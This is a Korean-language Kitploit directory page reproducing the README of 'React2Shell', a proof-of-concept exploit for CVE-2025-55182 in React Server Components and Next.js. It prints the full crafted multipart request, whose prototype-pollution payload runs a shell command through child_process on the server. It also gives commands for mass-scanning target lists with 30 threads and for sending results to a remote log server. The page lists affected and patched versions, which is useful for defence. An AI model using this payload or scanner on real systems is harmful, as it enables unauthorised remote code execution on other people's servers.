Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
React2Shell-Exploit-CVE-2025-55182 — React2Shell은 Next.js의 취약한 React Server Components(RSC) 구현에 영향을 주는 CVE-2025-55182에 대한 개념 증명 익스플로잇입니다. | Kitploit
도구/GitHubGitHub/indra-031/react2shell-exploit-cve-2025-55182
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHubindra-031/react2shell-exploit-cve-2025-55182

React2Shell-Exploit-CVE-2025-55182

React2Shell은 Next.js의 취약한 React Server Components(RSC) 구현에 영향을 주는 CVE-2025-55182에 대한 개념 증명 익스플로잇입니다.

저장소 보기
121개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

💀 React2Shell 익스플로잇 — CVE-2025-55182

root@kitploit:~
██████╗ ███████╗ █████╗  ██████╗████████╗██████╗ ███████╗██╗  ██╗███████╗██╗     ██╗
██╔══██╗██╔════╝██╔══██╗██╔════╝╚══██╔══╝╚════██╗██╔════╝██║  ██║██╔════╝██║     ██║
██████╔╝█████╗  ███████║██║        ██║    █████╔╝███████╗███████║█████╗  ██║     ██║
██╔══██╗██╔══╝  ██╔══██║██║        ██║   ██╔═══╝ ╚════██║██╔══██║██╔══╝  ██║     ██║
██║  ██║███████╗██║  ██║╚██████╗   ██║   ███████╗███████║██║  ██║███████╗███████╗███████╗
╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝ ╚═════╝   ╚═╝   ╚══════╝╚══════╝╚═╝  ╚═╝╚══════╝╚══════╝╚══════╝

🔥 React Server Components 원격 코드 실행

CVE-2025-55182

제작: INDRA


⚠️ 면책 조항

이 프로젝트는 교육 목적, 보안 연구 및 승인된 침투 테스트용으로만 제공됩니다.

저자는 이 소프트웨어로 인한 어떠한 오용이나 손해에 대해 책임을 지지 않습니다.

이 익스플로잇은 소유한 시스템이나 명시적 테스트 허가를 받은 시스템에만 사용하세요.


📖 설명

React2Shell은 Next.js의 취약한 React Server Components (RSC) 구현에 영향을 미치는 CVE-2025-55182에 대한 개념 증명 익스플로잇입니다.

이 익스플로잇은 취약한 역직렬화 흐름을 악용하는 조작된 multipart 요청을 전송하고, 애플리케이션의 리디렉션 다이제스트 응답을 통해 명령 출력을 추출합니다.

성공하면 익스플로잇은 실행된 명령의 출력을 터미널에 직접 표시합니다.


✨ 기능

  • 🚀 단일 대상 모드
  • 🌍 대량 스캔 모드
  • 🔄 HTTP 및 HTTPS 자동 감지
  • ⚡ 멀티스레드 실행
  • 📝 선택적 로컬 로깅
  • 🌐 선택적 원격 로그 서버
  • 🎯 깔끔한 출력
  • 🛡 SSL 검증 비활성화 (테스트 환경용)
  • 📂 중복 대상 제거

📦 요구 사항

Python 3.8+

의존성 설치:

root@kitploit:~
pip install requests urllib3

📁 프로젝트 구조

root@kitploit:~
.
├── exploit.py
└── README.md

🔥 취약한 버전

React

버전상태
19.0⚠ 취약
19.1.0⚠ 취약
19.1.1⚠ 취약
19.2.0⚠ 취약
19.0.1✅ 패치됨
19.1.2✅ 패치됨
19.2.1✅ 패치됨

Next.js

취약 버전

  • 14.3.0-canary.77 이상
  • 15.x
  • 16.x

패치된 버전

  • 15.0.5
  • 15.1.9
  • 15.2.6
  • 16.0.7

📨 사용된 HTTP 요청

root@kitploit:~
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]

------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

🚀 사용법

도움말 보기

root@kitploit:~
python exploit.py -h

단일 대상 스캔

root@kitploit:~
python exploit.py -u https://target.com

여러 대상 스캔

targets.txt

root@kitploit:~
target1.com
target2.com
target3.com

실행

root@kitploit:~
python exploit.py -f targets.txt

결과 저장

root@kitploit:~
python exploit.py -u https://target.com -o results.txt

원격 로그 서버로 결과 전송

root@kitploit:~
python exploit.py -u https://target.com -l https://your-log-server.com

모두 함께 사용

root@kitploit:~
python exploit.py -f targets.txt -o results.txt -l https://your-log-server.com

📋 명령줄 옵션

옵션설명
-u대상 URL
-f대상 도메인이 포함된 파일
-o취약한 대상을 로컬에 저장
-l결과를 원격 로그 서버로 전송
-h도움말 표시

🖥 예제 출력

root@kitploit:~
🚀 Loaded 42 targets (HTTP + HTTPS)

🔥 [VULNERABLE] https://target.com/

💀 Command Output →
uid=1000(node) gid=1000(node) groups=1000(node)

──────────────────────────────────────────────

⚙️ 작동 방식

  1. 대상 읽기
  2. HTTP 및 HTTPS URL 자동 생성
  3. 조작된 multipart 요청 전송
  4. 리디렉션 다이제스트 파싱
  5. 명령 출력 추출
  6. 공격 성공 출력
  7. 선택적으로 결과를 로컬 또는 원격에 저장

📌 참고 사항

  • 스킴이 제공되지 않으면 HTTP와 HTTPS를 모두 자동 테스트합니다.
  • 중복 대상은 자동으로 제거됩니다.
  • 30개의 동시 스레드를 사용합니다.
  • 유효하지 않은 SSL 인증서를 무시합니다.
  • 타임아웃은 10초로 설정됩니다.

❤️ 크레딧

  • 익스플로잇 개발: INDRA
  • CVE: CVE-2025-55182

⚖️ 법적 고지

허가 없이 이 소프트웨어를 시스템에 무단 사용하면 로컬, 국가 또는 국제 법률을 위반할 수 있습니다.

저자는 어떠한 오용에 대해서도 책임을 지지 않습니다.


⭐ 이 프로젝트가 연구에 도움이 되었다면 스타를 남겨주세요.

즐거운 사냥 되세요 🕷️

도구 다운로드